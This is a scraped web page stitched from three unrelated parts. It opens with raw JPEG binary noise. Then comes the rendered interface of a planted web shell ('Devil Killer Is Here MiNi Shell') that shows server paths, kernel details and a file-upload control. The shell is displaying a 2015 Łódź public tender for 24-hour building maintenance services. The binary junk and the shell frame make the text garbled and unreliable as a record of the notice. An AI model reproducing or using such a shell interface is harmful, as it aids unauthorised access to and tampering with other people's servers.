JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151202/177597-N-2015.html

<p class="kh_header"><b>Łódź: Realizacja usługi konserwacji ogólnobudowlanej świadczonej w    
ramach pogotowia mieszkaniowego (wymagana 24 godzinna gotowość) w zakresie: robót dekarsko-blacharskich, ciesielskich, 
murarskich, tynkarskich, izolacyjnych, stolarskich, szklarskich, 
ślusarskich, nawierzchniowych  oraz usuwania skutków zimy w 
nieruchomościach  Gminy, Skarbu Państwa, Współwłasnych z 
udziałem Gminy powyżej 50% oraz  w lokalach gminnych w 
budynkach Wspólnot Mieszkaniowych administrowanych przez AZK 
Łódź-Górna, w podziale na cztery (4) części</b><br>
<b>Numer ogłoszenia: 177597 - 2015; data zamieszczenia: 02.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Górna , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 684 52 19, faks 42 684 52 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorna.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja usługi konserwacji ogólnobudowlanej świadczonej w    
ramach pogotowia mieszkaniowego (wymagana 24 godzinna gotowość) w zakresie: robót dekarsko-blacharskich, ciesielskich, 
murarskich, tynkarskich, izolacyjnych, stolarskich, szklarskich, 
ślusarskich, nawierzchniowych  oraz usuwania skutków zimy w 
nieruchomościach  Gminy, Skarbu Państwa, Współwłasnych z 
udziałem Gminy powyżej 50% oraz  w lokalach gminnych w 
budynkach Wspólnot Mieszkaniowych administrowanych przez AZK 
Łódź-Górna, w podziale na cztery (4) części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja usługi konserwacji ogólnobudowlanej świadczonej w ramach pogotowia mieszkaniowego (wymagana 24 godzinna gotowość we wszystkie dni tygodnia) w zakresie: robót dekarsko-blacharskich, ciesielskich, murarskich, tynkarskich, izolacyjnych, stolarskich, szklarskich, ślusarskich, nawierzchniowych  oraz usuwania skutków zimy w nieruchomościach Gminy, Skarbu Państwa, Współwłasnych z udziałem Gminy powyżej 50% oraz w lokalach gminnych w budynkach Wspólnot Mieszkaniowych administrowanych przez Zamawiającego, w podziale na cztery (4) części - zgodnie z cennikami usług. 
1.1. Zamawiający  przewiduje możliwość składania ofert częściowych.
1.2. Przedmiot zamówienia  został   podzielony na cztery (4) części:

1.3.1.  Część I postępowania: Usługi konserwacji ogólnobudowlanej świadczone w ramach pogotowia mieszkaniowego (wymagana 24 godzinna gotowość we wszystkie dni tygodnia) w zakresie: robót dekarsko-blacharskich, ciesielskich, murarskich, tynkarskich, izolacyjnych, stolarskich, szklarskich, ślusarskich, nawierzchniowych  oraz usuwania skutków zimy w nieruchomościach Gminy, Skarbu Państwa, Współwłasnych z udziałem Gminy powyżej 50% - zgodnie z wykazem nieruchomości stanowiącym załącznik nr 10 do SIWZ oraz w lokalach gminnych w budynkach Wspólnot Mieszkaniowych administrowanych przez: RON nr 1 będących w zarządzie Zamawiającego - Szczegółowy opis i zakres prac wynika z ust. 2. oraz zał. do SIWZ w postaci kosztorysu ofertowego - cennika usług - zał. nr 2.
1.3.2.  Część II postępowania: Usługi konserwacji ogólnobudowlanej świadczone w ramach pogotowia mieszkaniowego (wymagana 24 godzinna gotowość we wszystkie dni tygodnia) w zakresie: robót dekarsko-blacharskich, ciesielskich, murarskich, tynkarskich, izolacyjnych, stolarskich, szklarskich, ślusarskich, nawierzchniowych  oraz usuwania skutków zimy w nieruchomościach Gminy, Skarbu Państwa, Współwłasnych z udziałem Gminy powyżej 50% - zgodnie z wykazem nieruchomości stanowiącym załącznik nr 10A do SIWZ oraz w lokalach gminnych w budynkach Wspólnot Mieszkaniowych administrowanych przez: RON nr 2 będących w zarządzie Zamawiającego - Szczegółowy opis i zakres prac wynika z ust. 2 oraz zał. do SIWZ w postaci kosztorysu ofertowego - cennika usług - zał. nr 2A.
1.3.3.  Część III postępowania: Usługi konserwacji ogólnobudowlanej świadczone w ramach pogotowia mieszkaniowego (wymagana 24 godzinna gotowość we wszystkie dni tygodnia) w zakresie: robót dekarsko-blacharskich, ciesielskich, murarskich, tynkarskich, izolacyjnych, stolarskich, szklarskich, ślusarskich, nawierzchniowych  oraz usuwania skutków zimy w nieruchomościach Gminy, Skarbu Państwa, Współwłasnych z udziałem Gminy powyżej 50% - zgodnie z wykazem nieruchomości stanowiącym załącznik nr 10B do SIWZ oraz w lokalach gminnych w budynkach Wspólnot Mieszkaniowych administrowanych przez: RON nr 3 będących w zarządzie Zamawiającego - Szczegółowy opis i zakres prac wynika z ust. 2 oraz zał. do SIWZ w postaci kosztorysu ofertowego - cennika usług - zał. nr 2B.
1.3.4.  Część IV postępowania: Usługi konserwacji ogólnobudowlanej świadczone w ramach pogotowia mieszkaniowego (wymagana 24 godzinna gotowość we wszystkie dni tygodnia) w zakresie: robót dekarsko-blacharskich, ciesielskich, murarskich, tynkarskich, izolacyjnych, stolarskich, szklarskich, ślusarskich, nawierzchniowych  oraz usuwania skutków zimy w nieruchomościach Gminy, Skarbu Państwa, Współwłasnych z udziałem Gminy powyżej 50% - zgodnie z wykazem nieruchomości stanowiącym załącznik nr 10C do SIWZ oraz w lokalach gminnych w budynkach Wspólnot Mieszkaniowych administrowanych przez: RON nr 4 będących w zarządzie Zamawiającego - Szczegółowy opis i zakres prac wynika z ust. 2 oraz zał. do SIWZ w postaci kosztorysu ofertowego - cennika usług - zał. nr 2C.
1.4. Usługi będą realizowane w dni robocze oraz w dni wolne od pracy (soboty, niedziele i święta) w 
       systemie całodobowym.
  1.5. Usługi świadczone będą w oparciu o zakresy czynności określone w formularzach  Cenowych 
         zwanymi cennikami usług stanowiących załączniki od nr 2- 2C do SIWZ. 
Zamawiający dopuszcza możliwość złożenia oferty przez jednego Wykonawcę maksymalnie na jedną dowolnie wybraną przez Wykonawcę część postępowania. 

2. Zamawiający w przedmiocie zamówienia dla wszystkich części postępowania wymaga od 
    Wykonawców:
2.1. Gotowości 24 godzinnej we wszystkie dni tygodnia;
   2.1.1. Przystąpienia do wykonania czynności objętych zamówieniem na podstawie otrzymanych 
             zleceń, jak i telefonicznych zgłoszeń przez Służby Miejskie bądź służby Zamawiającego:
a)	nie później niż w ciągu trzech godzin od przyjęcia zgłoszenia awarii zagrażającej życiu, zdrowiu i mieniu najemców Gminy Łódź,
b)	w ciągu maksymalnie 5 dni kalendarzowych od daty otrzymania pisemnego zlecenia - sprawy pilne lecz nie stanowiące zagrożenia życia, zdrowia i  mienia mieszkańców,
c)	pozostałe - w terminach uzgodnionych z Zamawiającym, lecz nie później niż w ciągu: 
                  10 dni kalendarzowych od daty otrzymania pisemnego zlecenia.
     2.1.2. Odbioru zlecenia od Zamawiającego w terminie maksymalnie 3- ech dni od daty 
               powiadomienia z pisemnym potwierdzeniem (data, podpis) otrzymanego zlecenia 
     2.1.3. Rezygnacja z realizacji zlecenia jest możliwa jedynie na wniosek potwierdzony przez 
               Zamawiającego - odpowiedzialnego terenowo Administratora. 
               Zlecenia nie wykonane przez Wykonawcę w terminie 10 dni kalendarzowych od daty 
               otrzymania zlecenia, należy zwrócić osobie wystawiającej zlecenie (administratorowi)  - 
               celem jego anulowania.   
2.2. Wykonane przez Wykonawcę prace wymagają pisemnego potwierdzenia przez administratora lub 
       pracownika nadzoru.
2.3. Udzielenia gwarancji na okres minimum 6 m-cy, na wykonane usługi.
2.4. Stosowania materiałów budowlanych posiadających atest i deklarację zgodności z obecnie 
       obowiązującymi normami i aprobatami technicznymi.
2.5. Przestrzegania przepisów bezpieczeństwa i higieny pracy - zgodnie z zasadami   
        bezpieczeństwa i higieny pracy określonymi w Rozporządzeniu Ministra Infrastruktury z dnia  
        06.02.2003 r. w sprawie Bezpieczeństwa i higieny pracy podczas wykonywania robót  
        budowlanych (Dz. U. Nr 47 poz. 401).
2.6. Odpowiedzialności za całość szkód powstałych na skutek prowadzonych prac.
2.7. Zachowania praw osób trzecich.
2.8. Prowadzenia usług pod nadzorem osób posiadających uprawnienia budowlane w specjalności 
       konstrukcyjno- budowlanej (wykonawcze).
2.9. Zapewnienia łączności z dyżurującymi osobami.
  2.10. Sporządzania zestawień rozliczeniowych z otrzymanych zarejestrowanych zleceń za wykonane 
        czynności na podstawie faktycznie wykonanych czynności (ilości jednostek miary) i  cen  
        jednostkowych (netto) w oparciu o cennik ryczałtowy cen jednostkowych (netto) - dwa razy  w 
        miesiącu, odrębnie, dla każdej nieruchomości. 
        Zestawienie obejmujące: nr zlecenia,  adres nieruchomości, wykaz wykonanych czynności 
        wraz z wbudowanym materiałem na nieruchomości, cenę jednostkową (netto) z cennika 
        ryczałtowego i ilość oraz wartość iloczynową zleconej roboty, potwierdzone przez właściwego 
        miejscowo administratora nieruchomości (MAN-a) lub pracownika nadzoru,  stanowić będzie   
        załącznik do wystawionych przez Wykonawcę faktur, odrębnie dla  każdej nieruchomości.
 2.11. W przypadku wykonania czynności nie uwzględnionych w cenniku ryczałtowym, rozliczenie 
          tych czynności nastąpi na podstawie kosztorysu powykonawczego sporządzonego przez 
          Wykonawcę w oparciu o KNR-y z zastosowaniem cen materiałów i pracy sprzętu, nie wyższych 
          niż średnie opublikowane w biuletynie Sekocenbudu aktualnych na dzień wykonania usługi oraz 
          składników cenotwórczych zaproponowanych w złożonej ofercie.
2.12. Zasady rozliczania i regulowania należności za wykonane usługi: 
a)	podstawą zestawienia rozliczeniowego jest iloczyn za rzeczywiście wykonane czynności konserwacyjne w nieruchomości oraz zaoferowane ceny jednostkowe, za czynności stwierdzone na podstawie pisemnego zlecenia - zgodnie z cennikiem ryczałtowym usług,
b)	dla czynności nie uwzględnionych w cenniku ryczałtowym usług rozliczenie nastąpi na podstawie kosztorysu powykonawczego sporządzonego w oparciu o KNR - y 
         z zastosowaniem cen materiałów i pracy sprzętu , nie wyższych niż średnie opublikowanych 
         w  biuletynie Sekocenbudu aktualnych na dzień wykonania usługi z zachowaniem 
         składników cenotwórczych zaoferowanych w ofercie.
c)	należności wynikające z wystawionych przez Wykonawcę faktur VAT wg stawki 
                obowiązującej na dzień wystawienia faktury VAT, na podstawie sporządzonych zestawień 
                rozliczeniowych lub kosztorysów będących załącznikami, Zamawiający regulować będzie w 
                terminie: 30 dni od daty przyjęcia faktury przez Zamawiającego,
d)	w przypadku nieterminowej zapłaty, Zamawiający zobowiązuje się do zapłaty Wykonawcy 
        ustawowych odsetek.
2.13. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 58.80.00.00-3, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku, wymaga oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dla wybranej części postępowania, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał należycie: usługi polegające na drobnych i bieżących naprawach konserwacji  ogólnobudowlanej  i zabezpieczaniu awarii w nieruchomościach, o porównywalnej wartości jak wartość składanej oferty. 
          Dla usług będących w trakcie realizacji należy załączyć kserokopie podpisanej umowy z 
          informacją potwierdzającą, że usługi są wykonywane należycie. Kwota podpisanej umowy nie    
          może być niższa niż wartość składanej oferty.    
          Dla potrzeb oceny spełnienia warunku określonego powyżej, jeżeli wartości zostaną podane   
          w walutach innych niż PLN, Zamawiający przyjmuje średni kurs PLN do tej waluty   
          podawany przez NBP na dzień opublikowania ogłoszenia w BZP. Jeżeli w dniu publikacji 
          ogłoszenia o zamówieniu w BZP, NBP nie publikuje średniego kursu danej waluty, za podstawę 
          przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji 
          ogłoszenia o zamówieniu w BZP, w którym zostanie on opublikowany.
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę (i ewentualnie Podwykonawcę), na zasadzie: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku, wymaga oświadczenia Wykonawcy z art. 22 ust.1 Pzp. , że dysponuje odpowiednim potencjałem  
           technicznym gwarantującym terminowe wykonanie usług - zgodnie z wymaganą wg sztuki 
           budowlanej technologią w przywołanych podstawach przedmiaru robót na podstawie   
           którego opracował cennik usług.  Zamawiający nie wyznacza szczegółowego warunku w   
           tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dla wybranej części postępowania, że dysponuje:
           minimum 9 osobami w tym: 
           -1 osoba posiadająca uprawnienia budowlane do wykonywania samodzielnych funkcji 
            technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo 
            budowlane w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno 
            -  budowlanej i legitymująca się aktualnym zaświadczeniem o przynależności do 
            właściwej Izby Samorządu Zawodowego, oraz                 
- 2 osoby murarz - tynkarz,  
- 1 osoba dekarz - blacharz,
- 1 osoba cieśla,
- 1 osoba malarz, 

- 1 osoba stolarz,
- 1 osoba szklarz,
- 1 osoba ślusarz-spawacz,
UWAGA: Ilekroć Zamawiający wymaga określonych uprawnień do pełnienia samodzielnych funkcji
technicznych w budownictwie na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994r. - 
Prawo budowlane (t.j. Dz. U. z 2013 r. poz. 1409, z późn. zm.), rozumie przez to również 
odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących 
przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, w którym 
Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ zgodnie z  ustawą 
o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii
Europejskiej (Dz. U. z 2008 r. nr 63 poz. 394 ze zm.). Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę (i ewentualnie Podwykonawcę), na zasadzie: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dla wybranej części, że posiada opłaconą polisę a w przypadku jej 
           braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności 
           cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę 
           ubezpieczenia - kwotę minimum: 100% ceny oferty.
           Spełnienie tego warunku będzie oceniane łącznie z dowodem zapłaty, o ile wprost z treści 
           polisy, a w przypadku jej braku innego dokumentu nie będzie wynikało, że jest ona opłacona.
           Jeżeli w trakcie realizacji umowy polisa straci ważność, Zamawiający będzie żądał     
           przedłożenia kserokopii nowej polisy potwierdzonej za zgodność z oryginałem.  
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę (i ewentualnie Podwykonawcę), na zasadzie: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz cenowy - cennik usług dla wybranej części postępowania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Stawka roboczogodziny z narzutami - 5</li>
<li>3 - Termin realizacji zlecen w sprawach pilnych - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian postanowień umowy, gdy zmiana wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy tj: a) ilość obsługiwanych nieruchomości np. zmiana formy własności nieruchomości, zmiana zarządcy, b) zmianę ilości obmiarowych (tj. metrów ,sztuk, msc. itd.) podane przez Zamawiającego w formularzu cenowym ilości mają charakter szacunkowy i mogą ulec zmianom w trakcie realizacji zamówienia, c) osoby bezpośrednio nadzorującej wykonanie robót (kierownika robót). 2. Wszelkie zmiany i uzupełnienia treści niniejszej umowy i jej załączników wymagają dla swej ważności formy pisemnej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorna.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> AZK Łódź- Górna, 93-129 Łódź, ul. Lubelska 9/11 pokój 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2015 godzina 10:00, miejsce: AZK Łódź- Górna, 93-129 Łódź, ul. Lubelska 9/11 pokój 6 - sekretariat.</p>
